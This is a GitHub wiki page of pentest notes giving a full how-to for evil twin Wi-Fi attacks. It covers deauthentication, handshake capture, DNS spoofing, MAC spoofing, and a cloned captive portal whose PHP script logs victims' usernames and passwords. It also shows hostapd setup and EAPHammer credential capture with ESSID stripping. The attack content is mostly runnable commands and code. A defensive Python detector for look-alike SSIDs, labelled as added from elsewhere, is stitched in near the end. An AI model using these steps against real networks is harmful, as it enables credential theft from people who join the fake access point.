Wireless Evil Twin Attacks - CraigDonkin/Infrastructure GitHub Wiki

Rogue AP

  • Wireless AP that imitates a legitimate one.
  • Called an Evil Twin

Simplified attack

  • Fake AP
  • Deauth
  • Victim connects
  • Capture traffic, strip TLS, phish with a captive portal, etc.

Detailed attack

Reconnaissance

  • Set interface to monitor mode and scan for WiFi networks
airmon-ng start <interface>
airodump-ng <interface> -w <filename> -c <channel>
  • Identify a connected client and then deauth them to capture the WPA handshake
aireplay-ng --deauth 5 -a <mac address> <interface>
airodump-ng <interface> -w <file>

Configure routing

  • Use dnsmasq with the following dns.conf
interface=wlan1
dhcp-range=192.168.0.2,192.168.0.254,255.255.255.0,10h
dhcp-option=3,192.168.0.1
dhcp-option=6,192.168.0.1
server=8.8.4.4
server=8.8.8.8
listen-address=127.0.0.1
address=/#/192.168.0.1
log-dhcp
log-queries
  • Start dnsmasq
dnsmasq -C dns.conf -d
  • Make sure nothing else is listening on port 53

  • Configure an IP for the interface

ifconfig <interface> <ip>/24
  • Enable IP Forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
  • Change the MAC address to be very similar to the target AP's
ifconfig <interface> down
macchanger -m <mac> <interface>
ifconfig <interface> up
  • Use DNSSpoof to redirect traffic to our IP
dnsspoof -i <interface>

Setup Captive Portal

  • Enable Apache Rewrite
a2enmod rewrite
  • Edit /etc/apache2/apache2.conf
<Directory />
	Options FollowSymLinks
	AllowOverride All
	Require all denied
</Directory>
<Directory /var/www/>
	Options Indexes FollowSymLinks
	AllowOverride All
	Require all granted
</Directory>
  • Create .htaccess inside /var/www/html
RewriteEngine on
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . index.html [L]
  • Restart Apache
service apache2 restart
  • Clone the captive portal
httrack <url>
  • Direct the form action to received.php
<form action="/received.php" method="POST" class="centered-form">
  • Received.php:
<?php
if(isset($_POST['submit'])) {
    $username = $_POST['username'];
    $password = $_POST['password'];

    $data = $username . ' ' . $password . "\r\n";
    $ret = file_put_contents('passes.lst', $data, FILE_APPEND | LOCK_EX);
    if($ret === false) {
        die('An error has occurred');
    }
    else {
        echo "Thank you for signing in. You will be redirected shortly!";
    }
}
else {
    die('No post data to process');
}
?>
  • Store the fake portal in /var/www/html

Start the Rogue AP

  • Create hostapd.conf
interface=wlan1
driver=nl80211
ssid=<SSID>
hw_mode=g
channel=1
auth_algs=1
bssid=<MAC address>
  • Launch the AP:
hostapd hostapd.conf

Allow internet access

  • Once the captive portal has been used we can set up firewall rules to allow internet access
iptables --append POSTROUTING --table nat --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan1 -j ACCEPT

EAPHammer

https://github.com/s0lst1c3/eaphammer
https://github.com/s0lst1c3/eaphammer/wiki

Basic use

eaphammer --cert-wizard
eaphammer -i <interface> --channel <channel> --auth wpa-eap --essid <essid> --creds

ESSID Stripping

  • Causes the network name to appear differently in the devices list of networks compared to the actual network name.
  • Uses non-printable UTF-8 characters
\x20 = space
\x00 = Null, will omit chars after it
\t = Add a tab
\r = Add a new line
\n = Add an enter
  • Example:
FreeWifi\x00pentest
  • In EAPHammer create a self signed cert
eaphammer --cert-wizard
  • Start a rogue AP with the ESSID stripping option
eaphammer -i <interface> --auth wpa-eap --essid <essid> --creds --negotiate balanced --essid-stripping '\t'
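A defensive counterpart to the stripping trick above, added here as an example and not part of this wiki or of EAPHammer: it normalises advertised SSIDs the way a client's network list would display them and flags beacons that collapse onto a trusted name but are not byte-identical or come from an unknown BSSID. The beacon list, BSSIDs and trusted map are constructed sample data.

```python
# Added example: flag ESSID-stripping look-alikes of a trusted network.
# Suitable as a check inside a wireless IDS or a periodic scan of beacon data.
import unicodedata

# Constructed sample of observed beacons: (SSID bytes as advertised, BSSID).
# The first entry is the legitimate AP; the others are look-alikes of the
# kind the section above describes. All values are made up.
OBSERVED = [
    (b"FreeWifi", "aa:bb:cc:dd:ee:01"),
    (b"FreeWifi\x00pentest", "aa:bb:cc:dd:ee:02"),  # NUL hides the suffix
    (b"FreeWifi\t", "aa:bb:cc:dd:ee:03"),            # trailing tab
    (b"FreeWifi ", "aa:bb:cc:dd:ee:04"),             # trailing space
    (b"FreeWifi\r\n", "aa:bb:cc:dd:ee:05"),          # CR/LF padding
    (b"Guest", "aa:bb:cc:dd:ee:06"),                 # unrelated network
]

# Trusted SSID -> set of known-good BSSIDs (constructed).
TRUSTED = {"FreeWifi": {"aa:bb:cc:dd:ee:01"}}


def displayed_name(raw: bytes) -> str:
    """Approximate what a device's network picker shows for a raw SSID."""
    raw = raw.split(b"\x00", 1)[0]  # NUL terminates C-string style handling
    text = raw.decode("utf-8", errors="replace")
    # Drop control characters (tab, CR, LF, ...) and surrounding whitespace.
    text = "".join(ch for ch in text if unicodedata.category(ch)[0] != "C")
    return text.strip()


def find_lookalikes(observed, trusted):
    """Return (raw_ssid, bssid, trusted_name) for beacons that would display
    as a trusted SSID but differ in raw bytes or come from an unknown BSSID."""
    findings = []
    for raw, bssid in observed:
        name = displayed_name(raw)
        if name not in trusted:
            continue
        exact = raw == name.encode()
        if not exact or bssid not in trusted[name]:
            findings.append((raw, bssid, name))
    return findings


if __name__ == "__main__":
    for raw, bssid, name in find_lookalikes(OBSERVED, TRUSTED):
        print(f"ALERT: {bssid} advertises {raw!r}, shown to users as {name!r}")
```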

Airgeddon

https://github.com/v1s1t0r1sh3r3/airgeddon
https://github.com/v1s1t0r1sh3r3/airgeddon/wiki

Fluxion

https://github.com/FluxionNetwork/fluxion
